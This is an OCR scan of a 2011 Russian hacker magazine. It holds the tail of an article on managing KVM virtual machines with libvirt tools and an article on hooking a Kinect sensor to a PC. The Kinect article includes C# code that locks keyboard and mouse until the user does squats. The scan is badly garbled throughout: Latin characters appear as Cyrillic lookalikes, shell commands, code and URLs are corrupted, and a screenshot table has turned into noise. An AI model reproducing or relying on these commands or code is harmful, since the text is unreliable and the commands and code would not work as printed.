$ зисіо ирсіаіе-гс .сі --Р сІИссІЬсІ петоѵе 

через виртуальный сетевой мост. Виртуальная машина сможет 
принимать и инициировать соединения. Это идеальный вариант, 
но он требует дополнительной настройки (смотри врезку «На- 
стройка сетевого моста в ІІЬипІи»). 

2. пеІ\л/огк:имя_сети — подключение к внутренней виртуальной 
сети. Машина будет помещена в изолированную виртуальную сеть, 
но сможет получить доступ к внешней сети, используя ІЧАТ. Со- 
вершенно неприемлемый с практической точки зрения вариант, 
который удобен тем, что не требует какой-либо настройки. Опция 
«имя_сети» должна совпадать сименемфайлав каталоге /ѵаг/ИЬ/ 
ІіЬѵИ/пеІѵѵогк, плюс расширение «хт I». Список имеющихся сетей 
можно получить, используя следующую команду: 

# ѵігзб пеі-іізі: --аіі 



■ Ѵ&П-4Г -Ь 



РШіуіЕН 


3114 


иім 


Лѵйі ] йС'Іе 


І1И 


цьлііілмкы /ашѵ/ійлі 


Я. 40 


3.30 


В Ій 


17. 7Ш 


/Мѵ/ИШг ВДІ Аир* 




ТЩ.ІИ 


I 94 


ЭТ ІИ 


МІІПІЯІІ М( 


Ш.ѴІ 


111. ЗК 


]<а.Р 


И.7* 


МЦаріяМ : /4вѵ/4вЫ*пЪь*4/иц> 


з*г.4н 


іа.*« 




ІЯ 


1 /№/4іил4х«Ѵпг 


Э іг. 


М5 


2. И 


ш п 


: /^іг^іЬилни/ѵкг 


1.70 


В-11 . ЙЧ 


ІИ1.Ѵ* 


А ІИ 


шцльи /арѵ/чиз 


ЭЯ аи 


1.1. ЙН 


1*Т 1Н іа . И 


МИ7І /Ѵп/ѴРІБГМрНа^ИІН 


«К 


1,16 


В, 26 


лт п 


РМѵН /Япч/ѵйжі 




и. г» 




! /ЙімЛтіІбГ&ирОЦ-іІ ЩѴДІИ 


• К 


а « 


Ш 2С. 


И в* 


■ Нлѵ/шйші 


И. 


Л ІЛ 


№ » 2І П 


11 : /Уіѵ/ійі .1 


ІЪ. н 


г. ю 


І? « 


І* « 



Команда ѵігі-сК покажет занятость дисков всех вирту- 
альных машин 



3. и зе г — подключение к сети, используя 8ЫРР. Удобен только 
в тех случаях, когда гостевая система должна быть запущена от 
имени непривилегированного пользователя. 

С помощью опции '--сПзк' мы заставляем ІіЬѵИ создать новый 
образ диска, указывая путь до файла и его размер. Если бы мы 
хотели использовать уже существующий образ диска, то могли бы 
просто опустить опцию ’зіге'. Из других опций внимания заслужи- 
вает 'зрагзе', с помощью которой можно указать, должен ли образ 
быть динамически расширяемым (зрагзе=1;гие, поумолчанию) или 
иметь фиксированный размер (зрагзе^аізе). 

В первом случае образ будет расти по мере его наполнения, но 
только до тех пор, пока его размер не достигнет указа иного в оп- 
ции ’зіге'. Во втором случае образ сразу будет иметь запрошенный 
размер. Это предпочтительный вариант для боевых серверов, так 
как, во-первых, на динамическое расширение тратятся ресурсы 
системы, а во-вторых, постоянный рост дисков может привести к 
израсходованию ресурсов в самый неподходящий момент. 

Также рекомендую сразу позаботиться о переносе каталога /ѵаг/ 
ІіЬ/ІіЬѵИ/ітадез на І_ѴМ-том или другой сервер (с помощью І\ІЕ5 
или Р0НМЕІ_Р5, например). Та к ты решишь многие проблемы, 
которые могут возникнуть в будущем. 

С помощью опции '--сбгоітГ мы указали путь кустановочному 
150-образу. Это плохой пример, потому как хранить установочные 
образы в каталоге Атр боевого сервера опрометчиво. Гораздо 
удобнее использовать для этой цели другую машину, просто указав 
ее адрес и каталоге предпочтительным 150-образом: 

- -ссігот Тір : //Тіобі: . сот/іта§е5/иЬип1:и/ 

А еще лучше указать адрес, содержащий образы ядра и іпіігсі, 
которые произведут сетевую установку дистрибутива из офици- 
альных ИСТОЧНИКОВ: 

- -Іосаііоп 61:1: р : //-Рір . из . сІеЬіап . оп^/сІеЬіап/сІІБІБ/еісІі/ 
таіп/іп5І:а11ег-атсІ64/ 

Но это, как говорится, в какой конфигурации что удобнее. По- 
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Создаем новую виртуальную машину с помощью ѵігі-тападег 



У ОХМ^лмть | Надад | | 



следняя опция ('--поаиіосопзоіе') отключает авто- 
матическое открытие консоли сразу после создания 
виртуальной машины. Также доступны опции ' — ѵсриз' 
и ' — сризеЕ, которые позволяютуправлять количе- 
ством ядер процессора внутри виртуальной машины и 
количеством доступных ей ядер физической машины 
(через запятую, начиная с нуля). 

Команда создаст описание виртуальной машины, по- 
меститего в файл /еІс/ІіЬѵігі/цети/ѵтІ .хті и запустит 
виртуальную машину. Проверить ее работоспособность 
можно с помощью уже упоминавшейся ранее команды 
’ѵігзЬ Іізі'. Сам файл описания можно открыть в тексто- 
вом редакторе, чтобы просмотреть или изменить. Он 
имеет вполне читаемый и логичный формат. 

Если виртуальная машина запустилась, к ней можно 
подключиться с помощью инструмента ѵі гі-ѵі еѵѵе г, 
который можно найти в одноименном пакете: 

$ біісіо ар* -де* Іп5*а11 



Естественно, запускать ѵігі-іпзіаіі лучше судаленной 
машины. Если все пошло хорошо, должно открыться 
окно, содержащее экран виртуальной машины и, соот- 
ветственно, инсталлятор выбранной ОС. 

После окончания установки виртуальная машина будет 
полностью готова к использованию, в нее можно будет 
войти с помощью команды ’сопзоіе ѵті ', запросить 
информацию с помощью команды ' б от іпЬ ѵті ', до- 
бавить в список авто-запуска (который происходит 
во время запуска демона Іібѵігіб) командой 'аіЛозІагІ 
ѵті ', заморозить (команда ’заѵе'), разморозить 
('гезите '), завершить ( 'зЬ и1;сІ оѵѵп ' ) , запустить ГзІагГ], 
уничтожить ('безігоу'), добавить или удалить сетевые 
интерфейсы СаиасЬ-беѵісе'), добавить новые диски и 
многое другое, но самое главное — теперь виртуальную 
машину можно клонировать: 

$ біісіо ѵіг*-с1опе \ 

- -соппес*=дети : ///5у5*ет -о ѵті -п ѵт2 




> ѵѵагпіпд 

ЗеЫпих, по умолча- 
нию включенный в 
Еебога и некоторых 
других дистрибутивах, 
не позволит загрузить 
образы виртуальных 
машин, если они 
расположены не в ка- 
талоге /ѵа г/іі Ь/Іі Ьѵі г*/ 
ітадез. 



$ ѵіг*-ѵіеыег -с дети : ///5у5*ет *е5* 



В результате будет создана новая виртуальная машина 
ѵт2, конфигурация которой будет полностью повторять 
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Инструмент тонкой настройки виртуальной машины в ѵііі-тападег 



конфигурацию ѵті , но жесткий диску нее будет свой. С помощью 
'ѵИ-сІопе' можно создать столько виртуальных машин, сколь- 
ко нужно, в полностью автоматическом режиме. Если же одной 
физической машины будет недостаточно для обслуживания всех 
имеющихся ВМ, можно поднять новый ІіЬѵИ-сервер и переселить 
особо прожорливых на него: 

$ біісіо ѵігБІі ті^гаіе --Ііѵе ѵтІЗб \ 

Яети+5 в Іі : //6051:2 . сот/ Бузует 

Не забыв проверить результат: 

$ біісіо ѵігбіі дети+ББІі : //Моб1:2 . сот/зузіет іібі; 

С помощью ѵігзб управлять виртуальными серверами просто и 
удобно, но для людей, привыкших к 6111 и ѵѵеЬ-системам, такой 
интерфейс может показаться слишком ограниченным и не нагляд- 
ным. Поэтому существует инструмент под названием ѵігі- та падег, 
который позволяет делать почти все то же самое с помощью удоб- 
ного графического интерфейса. 

ѵігі-тападег 

Программа ѵИ- та па де г ( ѵИ-тападег.о ) развивается в рамках 
проекта, который включает в себя не только саму программу, но и 
описанные выше инструменты ѵігЫпзІаІІ, ѵИ-сІопе и ѵИ-ѵіеѵѵег. 
Более того, весь проект находится под покровительством компа- 
нии Веб На!, которая и была инициатором рождения библиотеки 
ІіЬѵігі. Поэтому, если говорить о каком-либо стандарте, то им 
можно считать именно этот набор инструментов. 

С практической точки зрения ѵігі- та падег представляет собой 
простую (на вид) графическую программу, в верхней части кото- 
рой находятся инструменты управления виртуальными машина- 
ми, а в нижней — список доступных эмуляторов (гипервизоров, 
в нашем случае там должен быть только О ЕМ II) и виртуальных 
машин. 

Для создания новой виртуальной машины достаточно нажать 
кнопку «Новая», дать название машине, выбрать вариант уста- 
новки, установочный образ, указать тип ОС и ее версию, указать 



количество ОЗУ и ядер процессора (смотри скриншоты). Все то 
же самое, что и при использовании утилиты ѵігЫпзіаІІ. Поста- 
вив галочку напротив пункта «Настроить конфигурацию перед 
установкой» можно сделать более конкретную настройку машины, 
включая выбор эмулируемых устройств и возможностей эмулято- 
ра, подключить дополнительные диски, произвести подстройку 
под ОС (например, отключить АСРІ для ІЧеіВЗО) и сделать многое 
другое. 

После этого в списке виртуальных машин появится новая ВМ. С 
помощью правого клика мышью виртуальную машинулегко клони- 
ровать, перенести на другую машину, приостановить или выклю- 
чить. Рабочий стол машины в любой момент доступен с помощью 
кнопки «Открыть» в верней панели инструментов. 
Воспользовавшись пунктом «Свойства подключения» в меню 
«Правка» или кликнув по имени гипервизора в списке вирту- 
альных машин и выбрав в контекстном меню «Свойства», можно 
узнать подробности о машине, на которой работает эмулятор (тип 
процессора, количество ядер, объем памяти, нагрузка на систему), 
а также настроить виртуальные сети, хранилище образов, убрать/ 
добавить новые образы и сетевые интерфейсы. 

С помощью пункта «Добавить соединение» в меню «Файл» можно 
создать подключение к другому гипервизору (хоть удаленному, 
хоть локальному) и все его виртуальные машины будут отображены 
в общем списке. 

Другие инструменты 

Набор доступных инструментов управления виртуальными маши- 
нами не ограничивается только перечисленными выше програм- 
мами. На странице ІіЬѵИ.огд/аррз.ЫтІ перечислены приложения, 
способные использовать ІіЬѵИ в своей работе. Настоящих жемчу- 
жин среди них немного, но они есть: 

• ѵігЫор ( реор[е.гебба1.сот/~г)опе5/ѵіг1:-1:ор ) — ТОР-подобная 
утилита для отображения списка самых «прожорливых» вирту- 
альных машин. Поддерживает почти все опции командной строки 
оригинального іо р. 

• ѵігі-сі? ( реор[е.гебЬа1.сот/~г)опезАлг1:-с1{ ) — аналог команды Ф, 
показывающий процент занятости пространства на виртуальных 
жестких дисках. 
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• ѵігІ-р2ѵ [ реорІе.ге(ІЬа{.сот/-г|опе5/ѵіг{-р2ѵ 1 — инструмент для 
преобразования физических машин в виртуальные и обратно. 

• ѵіг*-ѵ2ѵ [ діиебогаЬо5Іеб.огд/діі/?р=ѵИ-ѵ2ѵ.діІ:а=5иттагѵ ) — 
программа для конвертирования образов, созданных другими 
системами виртуализации, в формат дети-кѵпп. 

ѴѴеЬ-ориентированные системы 
управления 

Среди ѴѴеЬ-ориентированных интерфейсов можно выделить япон- 
ский Кагезапзиі, который совсем недавно обновился до версии 
2.0. Внешне он представляет собой довольно привлекательный на 
вид ѴѴеЬ2. 0-интерфейс управления ВМ, поддерживающий массу 
возможностей и вполне способный заменить собой ѵИ-тападег. 
Кроме всего прочего, он поддерживает сбор статистики и мони- 
торинг, а также способен выводить на ѴѴеЬ-страницу содержимое 
экрана гостевой ОС. 

Внутри Кагезапзиі представляет собой РуіЬоп-приложение с 
ЭСНЛе в качестве базы данных и Эаѵа-плагином іідЫѴЫС^аѵа, 
используемым для вывода изображения, передаваемого с ѴІМС- 
сервера ІіЬѵИсІ. Для построения интерактивного ѵѵеЬ-интерфейса 
используется библиотека ]Оиегу. 

Кроме того, ябы очень рекомендовал присмотреться к системе 
под названием АгсЬіреІ [ а гс Ы р е I р го] е с 1: . о гд ) . которая представ- 
ляет собой ЭаЬЬег-сервис, позволяющий рулить виртуальными 
окружениями буквально с помощью приказов, отдаваемых через 
ІМ-клиент, и, что самое главное, получать от них ответы и отчеты о 
состоянии и сбоях. 

Преимущество такого подхода в том, что он избавляет админи- 
стратора от необходимости слежения за парком виртуальных 
серверов или настройки какой-либо системы оповещения. Гипер- 
визоры и виртуальные серверы будут сами отчитываться перед 
хозяином с помощью отправки сообщений на ]аЬЬег-аккаунт. 
Кроме того, полнофункциональные браузеры, нужные для получе- 
ния доступа к полноценным системам управления виртуальными 



машинами, доступны далеко не везде и не всегда, а простейший 
^ЬЬег-клиент будет работать даже на бюджетном телефоне 2000 
года выпуска и позволит получить управление над виртуальным 
сервером даже в той ситуации, в которой все остальные инстру- 
менты окажутся недоступны. 

Кроме интерфейса, основанного на протоколе ХМРР, АгсЬіреІ 
может предложить админам и классический ѴѴеЬ-интерфейс, 
который можно использовать тогда, когда под рукой есть нормаль- 
ный браузер. Возможности этого интерфейса довольно широки и 
ничуть не уступают описанному выше Кагезапзиі. Их официальный 
список вы глядит та К: 

• Визуализация состояния и нагрузки на сервер в режиме реаль- 
ного времени; 

• Возможность отправки любых команд АгсЬіреІ; 

• Возможность обмена сообщениями с другими пользователями 
системы; 

• Механизм посылки сообщений сразу группе серверов или ги- 
первизоров; 

• Безопасность подключения, обеспечиваемая механизмами 
ХМРР 525. 

Многие системы обслуживания облачной инфраструктуры основа- 
ны на ІіЬѵігІ. Это, в частности, совместимые с Атагоп ЕС 2 системы 
Еисаіуріиз ( ореп.еисаіѵріиз.сот і и ОрепЭіаск [ орепзіаск.огд ]. 
система для быстрого развертывания облачной инфраструктуры 
ОрепІМобе [ ореппобе.асЬѵезѵз.огд ) и основанная на технологиях 
АбоЬе Еіех и Эип/Огасіе ^ѵа система АЬіСІоиб [ соттипіІѵ.аЬідио. 
сот ). 

Выводы 

За последние годы І_тих сделал большой шаг вперед во всем, что 
такилииначе связано с виртуализацией. 

О ЕМ II и КѴМ, которые еще несколько лет назад казались и груш- 
кой для гиков и не воспринимались серьезно, теперь правят 
балом. ~іг 



ХАКЕР 07 /1 50/ 201 1 



► 129 








РНРЕАКІЫО 



■ ■ Сергей Сильнов (роПЗки текау.сот) 

К6В-камера 




Разбираемся с новым девайсом и учимся писать 
для него приложения 

о Сенсор Кіпесі разработан для ХЬох 360 и позволяет играть в игры 
без всяких приспособлений в руках. Появившись в ноябре 2010 года, 
он стал самым продаваемым электронным устройством в мире: за 
первые 2 месяца было продано более 10 млн штук. Изначально сен- 
сор работает лишь с консолью, но при помощи ловких движений рук 
ты сможешь заставить его работать с РС, а он поможет тебе поддер- 
живать физическую форму! 

Прежде чем втыкать Кіпесі в компьютер, разберемся с его вну- 
тренностями. Наш экземпляр, который дали помучить ребята 
из хЬс , разбирать мы не решились, да и незачем — на 

сайте ібхіі.сот опубликовано подробное пошаговое руководство 
о том, как разобрать его до винтика. Итак, внутри у Кіпесі’а нахо- 
дятся: 

1. Камера видимого диапазона — обычная РОВ-камера, похожа 
на среднестатистическую веб-камеру: 640x480 и 30 кадров в 
секунду. 

2 . Инфракрасный лазерный проектор, который создает в про- 
странстве сетку из точек. 



3. Камера, снимающая в инфракрасном спектре, которая реги- 
стрирует изображение этой сетки. 

4 . Стереомикрофон с продвинутой системой шумопонижения — 
для правильного голосового управления. 

5 . Мотор, регулирующий положение датчика. 

6. Чип РгіппеЗепзог — творит главную часть магии, обрабатывая 
картинку с ИК-камеры, дает на выходе — 30-картинку. 

Подключение 

Кіпесі'ы, продающиеся в коробках, уже имеют все необходимое 
для работы, их можно подключить к компьютеру напрямую. Если 
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Отслеживание и калибровка пользователя в Раазі 

же сенсор из комплекта с новым хЬох’ом, то к нему потребуется 
специальный адаптер, так как разъем 115В там нестандартный, 
с дополнительным питанием 12 В (сенсору слабенького тока от 
порта недостаточно). Оригинальный блок питания можешь купить 
в магазине МісгозоТі за $34,99, а сэкономить получится, заказав 
китайский клон ( з.сІеаІехітеппе.сот/зеагсЬ/кіпесІ+роѵѵег+зиррІѵ ) 
в три раза дешевле. Теперь можешь подтыкать к компьютеру и 
начинать возиться с программной частью. 

Драйвера 

Как только кинект появился, компания Асіабги И; объявила кон- 
курс с призом в $3000 тому, кто создаст открытый драйвер для 
сенсора. Не прошло и недели, и денежки уже лежали на счету 
у победителя — Гектора Мартина, а первый работоспособный 
драйвер — в репозитории на дііЬиЬ.сот/ОрепКіпесі/ІІЫгеепесІ: . 
Многого он еще не умел, но главное — выводить карту глубин в 
окне 0реп6І_ у него уже получалось. 

Драйвер продолжает развиваться, и у него есть преимуще- 
ства — он распространяется под лицензией арасбе 2.0, которая 
позволяет использовать его в коммерческих проектах, и у него 
есть обертки для целой кучи языков Уаѵа, таДаЬ, руібоп, гибу). 
Но тебе лучше взять другой драйвер. Сердце КіпесГа разра- 
ботано не великой и могучей МісгозоТі, а молодой компанией 
РгітеЗепсе. Для них Кіпесі — всего лишь один продукт, исполь- 
зующий их технологию N111 (паіигаі изег іпІегТасе) — есте- 
ственного пользовательского интерфейса, который позволяет 



человеку взаимодействовать с системой визуально, при помощи 
жестов, а также при помощи голосовых команд. Они жела- 
ют повсеместного распространения своего детища и активно 
помогают ореп зоигсе-сообществу. В их репозитории на гитхабе 
лежит драйвер для референсного сенсора. Напрямую с кинектом 
он не работает, но его допиленная версия справляется с этой 
задачей отлично! 

Скачать его можно, например, с сайта проекта Еаазі [ доо.ді/ 
Іи80з . После установки загляни в диспетчер устройств — в раз- 
деле РгітеЗепзог должно быть три устройства: Кіпесі Сатега, 
Кіпесі Моіог и Кіпесі Аи сі іо. 

Но кроме самого драйвера, тебе потребуются библиотеки ОрепЫІ 
и РгіппеЗепзе N ІТЕ. 

ОрепЫІ — это некоммерческая организация, которая стремится 
создать открытый стандарт для «Естественных взаимодействий» 

( N аіи га I Іпіегасііопз). Также она разработала ОрепЫІ — одно- 
именный фреймворк с открытым исходным кодом, созданный, 
чтобы взаимодействовать с одной стороны — с оборудованием, и 
с более высокоуровневыми программными прослойками — с дру- 
гой стороны. Развивается он бурно, и тебе потребуется послед- 
няя нестабильная его версия, загрузить которую можно здесь: 
доо.дІ/хРииЦ . 

N ІТЕ — это промежуточное ПО, которое решает задачи опреде- 
ления жестов для управления компьютером и играми и рабо- 
тает в связке с ОрепЫІ. Хотя это и коммерческий продукт, но 
его разработчик, РгітеЗепсе, распространяет бесплатный 
ключ, которым может пользоваться кто угодно. Вот этот ключ — 
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РНРЕАКІЫ6 




В облике супергероя іЛігазеѵеп 



ОКОІк2ЧеІВѴСІРѴѴѴпМоРКп5ссІѴ4=. Его надо ввести при установке. 
Загрузить N ІТЕ можно по ссылке: доо.д[/6иІ~Ш . 

После нужно изменить конфигурационные хті-файлы. 
Правильные версии можно загрузить по адресу: доо.ді/беі пг . 
Отличаются они от тех, что уже предустановленны, только ука- 
занием серийного ключа. Распакуй архив и скопируй файл 
ЗатрІеСопбд.хтІ из папки КіпесіХМЕз\ОрепІЧІ в папку Оаіа 
внутри каталога 0 реп N I (вероятнее всего, он внутри папки С:\ 
Ргодгат ЕіІез\), а файлы из папки КіпесіХМЕз\ІЧІТЕ — в С:\ 
Ргодгат ЕіІез\Ргіте 5епзе\ІЧІТЕ\ВаІа. 

Руки вверх, в позу Пси! 

Все готово, теперь можно пробовать кинект в деле. Для начала 
посмотри, какими готовыми программами ты можешь восполь- 
зоваться. Раазі (ЕІехіЫе Асііоп апб Агіісиіаіесі Зкеіеіоп Тооікіі) 

— это инструментарий, который позволяет завязать движения 
пользователя на различные нажатия кнопок, перемещения мыши 
или действия джойстика. Таким образом можно подобрать набор 
действий, чтобы весьма правдоподобно играться в любую игру на 
РС. Загрузить его можно с рго]есІ5.ісТизс.еби/тхгЛ : аа5І:/ . 
Пользоваться программой нетрудно. Первым делом нужно загру- 
зить файл конфигурации, написать который ты сможешь сам. 
Например, так он будет выглядеть для ѴѴогШ оі ѴѴагсгаІТ: 

# связь входного и выходного действия 

# Формат : 

# название_входного_действия порог тип_выходного_действия действие 
1еТ1:_агт_ои1: 10 кеу а 

1еТ1:_агт_асго5 5 10 кеу сі 
1еап_-РогыагсІ5 15 кеу м 
1еап_ЬаскыагсІ5 10 кеу 5 
1еТі:_агт_-Ропл/агсІ5 20 кеу ±аЪ 
гі§б1:_агт_-Ропл/агсІ5 20 кеу 1 
гі§Іі1:_агт_ир 12 кеу 4 
гі§Іі1:_агт_асго55 15 кеу 2 
гі§Іі1:_агт_ои1: 15 кеу 3 

После этого необходимо откалибровать пользователя, чтобы про- 
грамма поняла, где у тебя руки, а где ноги. Для этого необходимо 
встать в позу Пси, а проще говоря, встать ровно и поднять руки 
вверх, словно на тебя навели ствол нехилого калибра. После того 
как опознание завершится — поверх тела будет изображен схе- 
матичный человечек из прямых линий. Все — теперь компьютер 
покорно следит за твоими жестами. 



Кіпетоіе 

Другая программка для универсального управления. Из коробки 
позволяет управлять мультимедиа-центром ХВМС и просто курсо- 
ром мыши. Приятна она тем, что не требует калибровки и перево- 
дится в активный режим заранее выбранным жестом. Новые вер- 
сии периодически выкладываются на сайте кіпетоіе. пе 1 . А после 
последнего обновления в комплекте появилась еще и программа, 
позволяющая управлять не всем телом, а пальцами рук, правда, 
несмотря на все попытки, у меня она так и не заработала. 

Шгазеѵеп 

Ультра Севен — это японский супергерой из конца шестидеся- 
тых, который бы мог и потеряться в памяти поколений, если бы 
не кинект и программка ІДіхазеѵеп. Благодаря этой маленькой 
игрушке каждый может предстать в облике этого персонажа. 
Чтобы одеть его костюм, нужно встать в позу Пси. А уже оказав- 
шись в красном облачении, можешь прикладывать руки кушам, 
чтобы стрелять из смертоносного лазера и запускать бумеранг, 
торчащий из головы в виде ирокеза. Кроме тебя самого, отсле- 
живаются и другие объекты в комнате — лучи будут пролетать за 
ближе лежащими предметами. Да, важное замечание — игрушка 
требует достаточно серьезной видеокарты, а на слабом железе 
работать будет очень нестабильно. Сайт проекта: сосіе.доодіе. 
сот/р/кіпесІ-иИтаЛ 

В здороврм теле — 
здоровый дух 

Теперь — самое главное! О том, как написать свою программу, 
которая будет использовать возможности чудо-сенсора, а заодно 
и поддерживать бодрость тела: после часа работы за компьюте- 
ром она заблокирует клавиатуру и мышь и не позволит пользо- 
ваться вновь, пока не сделаешь десять приседаний. 

В уже установленном тобой пакете ОрепІЧІ есть примеры про- 
ектов (как на С++, так и на С#) для МісгозоІТ Ѵізиаі Зіисііо 2010, 
которые можно дописать для своих задач. Но эти примеры 
несколько запутаны, и будет проще воспользоваться оберткой, 
которую написал греческий студент Вангос Птернеас. Найти его 
библиотеку — ІЧиі.Ѵізіоп.сІЦ — можно на странице доо.д[/Х1Ч]д4 . С 
ней строчек кода понадобится гораздо меньше. 

Сначала создай в Ѵізиаі Зіисііо проект ѴѴРЕ Арріісаііоп и добавь 
в него ссылки на библиотеки ОрепІЧІ. пеі.сііі (она находится в той 
папке, куда установлен ОрепІЧІ) и ІЧиі.Ѵізіоп.сШ. (ее можно поло- 
жить в папку проекта). 

Теперь разберемся с работой сенсора. В описании формы 
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Так работает наше приложение 



МаіпѴѴіпсІоѵѵ.хаппІ выстави размер 662x520 и добавь к ней изобра- 
жение, в которое будет выводиться картинка с сенсора, и холст, 
на который будет выводиться дополнительная информация: 

<Іша§е Мате="іт§Сатега" /> 
кСапѵаз Nате= ,, ^ауои1:Коо1: ,, /> 

Дальше в коде формы МаіпѴѴіпсІоѵѵ.хатІ.сз объяви использова- 
ние необходимых пространств имен: 

іі5іп§ Бузует. СотропепІіМосІеІ; // нужен для обработки в фоне 
іі5Іп§ ІМиі.Ѵізіоп; // работа с кинектом 

Затем объяви новый объект ІЧиіІІзегТгаскег и инициализируй 
его в конструкторе. Да, нужно не забыть скопировать файл 
ЗатрІезСопбд.хтІ из директории ОрепІМІ в папки ОеЬид и 
Пеіеазе твоего проекта. 

В классе формы объяви все переменные: 

ІМиіІІзегТгаскег _5ке1е1:оп; // объявление объекта трекера 
Васк§гоипсІІлІогкег _могкег = Васк§гоипсІІлІогкег( ) ; 

// фоновый обработчик 
сІоиЬІе 1;орУ = 0; // верхнее положение приседания 

сІоыЬІе ЬаЬ'ЬотУ = 0; // нижнее положение приседания 

іпі: питО-РВоЬз = 0; // счетчик полуприседаний 

Ьоо' Ьо1:1:отРо5І1:іоп і 1:орРо5І1:іоп; 

// биты, в которых фиксируется пересечение линий 



ЕІІірзе еііірзе = пем ЕІІірзе // кружочек на груди 
{ РІ11 = ем Бо1ісІСо1огВги5Іі(Со1ог5 .АІісеВІие) , 

ІлІісІІіИ = 20, Неі§1і1: = 20 }; 

В конструкторе инициализируй обработчик событий: 

// инициализируем объект и подгружаем конфиги кинекта 
_5ке1е1:оп = пем Миіи5егТгаскег("Батр1е5Сопб§.хт1") ; 

// объявляем функцию, которая будет обрабатывать 
// событие перемещения пользователя 
_5ке1е1:оп.ІІ5ег5ІІрсІа1:есІ += іем ІМиіІІБегТгаскег . 

ІІзегІІ5І:ІІрсІа1:есІНапсІ1еп(5ке1е1:оп_ІІ5ег5ІІрсІа1:есІ) ; 

Теперь в переменной МиіІІзегизіЕѵепіАгдз.ІІзегБ представлены 
все обнаруженные пользователи и набор координат всех распо- 
знанных частей их тел. Далее напиши обработчик события смены 
координат пользователя. Как только у тебя появляется ненулевое 
значение вертикальной координаты шеи пользователя — считай, 
что он готов приседать. Потом добавь две линии. Одна чуть ниже 
шеи, а другая — чуть выше пояса. Одним приседанием будет счи- 
таться двойное пересечение обеих линий: сначала — сверху вниз, 
а потом — снизу вверх. Отслеживается пересечение линий шеи 
(хотя визуально она где-то на груди). Такой вариант не идеальный 
— можно схалтурить, нагибаясь, или подойдя поближе к сенсору. 

// проделываем все манипуляции для каждого пользователя 
// (хотя приседать они будут под одну гребенку) 
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РНРЕАКІЫ6 



■Рогеасіі (ѵаг изег е.ІІзегз) { 

// если впервые нашлась шея 

((іорѴ == 0) && (изег.ІМеск.Ѵ !=0) ) { 

// определяем положение верхней линии 
іорѴ = изег.ІМеск.Ѵ+20; 

І_іпе іорІ_іпе = пем І_іпе { // определяем верхнюю линию 
VI = ІорѴ,Х1 = 0, Ѵ2 = іорѴ, Х2 = 662, 

Бігоке = пем Бо1ісІСо1огВги5Іі(Со1ог5 . Кеб) , 
БігокеТІііскпезБ = 4 }; 

// рисуем верхнюю линию на холсте 
І-ауоиіКооІ: . СИіІсІгеп . АсІсІ (1:орИпе) ; 

// определяем положение нижней линии 
ЬоііотѴ = изег.Тогзо.Ѵ + 20; 

Ипе ЬоііотІЛпе = пем Ипе { // определяем нижнюю линию 
VI = ЬоііотѴ, XI = 0, У2 = ЬоііотѴ, Х2 = 662, 

Бігоке = пем Бо1ісІСо1огВги5Іі(Со1ог5 . Віие) , 
БігокеТІііскпеББ = 4 }; 

// рисуем нижнюю линию на холсте 
1_ауоиі:Кооі: . СИіІсІгеп . АсІсІ (Ьоі:і:отІ_іпе) ; 

// рисуем шею на холсте 

І_ауоиі:Кооі: . СИіІсІгеп . АбсІ(е11ір5е) ; } 

При каждом изменении координат нужно проверять, не произо- 
шло ли приседания: 

е11ір5е.Маг§іп= пем ТІііскпе55(и5ег.І\Іеск.Х, иБег.ІМеск.Ѵ, 

0, 0); //перемещаем кружочек вслед за шеей 
// ставим флажок верхнего положения 
іі (и5ег.І\Іеск.Ѵ+5 < іорѴ) ІорРоБІііоп = ігие; 

// ставим флажок нижнего положения 

(иБег.ІМеск.Ѵ + 25 > ЬоііотѴ) ЬоІііотРоБІііоп = ігие; 
і- (іорРоБІііоп && ЬоііотРоБІііоп) { // если оба флага есть 
питО-РВоЬ5++; // половину приседания в копилку 

іорРоБІііоп = -Раізе; // сбрасываем флажки 
ЬоііошРобіііоп = ; 

} 

// если полуприседаний набралось двадцать штук - значит все, 

// выключаем программу 
і-р (питО-РВоЬв >= 20) { 

АррІісаііоп.Сиггепі.БІіиісІоіл/пО; // выходим из программы 

} 

Осталось разобраться с таймером и блокировкой клавиатуры и 
мыши. Сперва в Арр.хаті.сз нужно добавить еще одно простран- 
ство имен: 

// работа с неуправляемым кодом, понадобится для 

// блокировки клавиатуры 

изіп§ Бузует. Кипііте. ІпіегорВегѵісеБ; 

Потом объявить метод блокировки клавиатуры и мыши. Удобно 
воспользоваться функцией ѴѴіпсІоѵѵз АРІ ВІоскІприП 

риЬІіс рагііаі сіэбб ІМаііѵеМеіІіосІБ { 

[Бузует. Кипііте. ІпіегорБегѵісеБ .011Ітрог1:А1:1:гіЬи1:е( 
"и5ег32.сИ1", ЕпігуРоіпІ: = "ВХоскХпри-р") ] 

[ еіигп: Бузует. Кипііте. ІпіегорбегѵісеБ .Маг5ба1А5А1:1:гіЬи1:е( 
Бузііет . Кипііте . ІпХегорБегѵісез . ІІптапа§есІТуре . Вооі) ] 

риЫіс Біаіііс ехіегп Ьооі В1оскІпри1:( 

[БуБіегп. Кипііте. ІпіегорбегѵісеБ .Маг5Ііа1А5А1:1:гіЬи1:е( 
БузХет . Кипііте . ІпіегорБегѵісеБ . ІІптапа§есІТуре . Вооі) ] 

Ьооі -РВІоскІІ:); 

} 

Для таймера можно создать отдельную форму и указать ее в Арр. 
хаті в качестве точки входа в программу. 



В код этой формы нужно добавить нэймспэйс работы с таймерами: 

изіп§ БузІет.Тітепз; 

Объявить таймер: 

ргіѵаіе Біаііс БузХет. Тітегз .Тітег ТЬеТітеп; 

А дальше запустить его, например, по нажатию кнопки: 

ргіѵаіе ѵоісі Ьи1:1:оп1_С1іск(оЬдес1: зепсіег, КоиіесІЕѵеп1:Аг§5 е) 

{ 

// ставим таймер на час 

ТЬеТітег = іем Бузіет. Тітегз .Тітег(3600000) ; 

// как пройдет - блокируем комп 

ТЬеТітег. ЕІарзесІ += Е1арзесІЕѵеп1:НапсІ1ег(В1оскРС) ; 
ТЬеТітег. ЕпаЬІесІ = ; 

} 

А при срабатывании таймера будет блокироваться пользователь- 
ский ввод и открываться окошко с видео с кинекта: 

ѵоіс! В1оскРС(оЬдес1: зоигсе, ЕІарзесІЕѵепіАг^з е) { 
Арр.ІМаІііѵеМеіІіосІБ.ВІоскІприіД гие); // блокируем ввод 
// создаем экземпляр формы с картинкой от сенсора 
МаіпІлІіпсІоы м = пем МаіпІлІіпсІом( ) ; 
м.5Ьом(); }// и показываем ее 

Осталось не забыть добавить отмену блокировки перед выходом 
из программы: 

// возвращаем пользователю клавиатуру и мышь 
Арр . ІМаііѵеМеіЬосІз . В1оскІпри1:( Раізе) ; 

Если что-то не получилось, то полный код проекта и все файлы, 
необходимые для запуска, ты сможешь найти на диске. 

Одного кинекта мало 

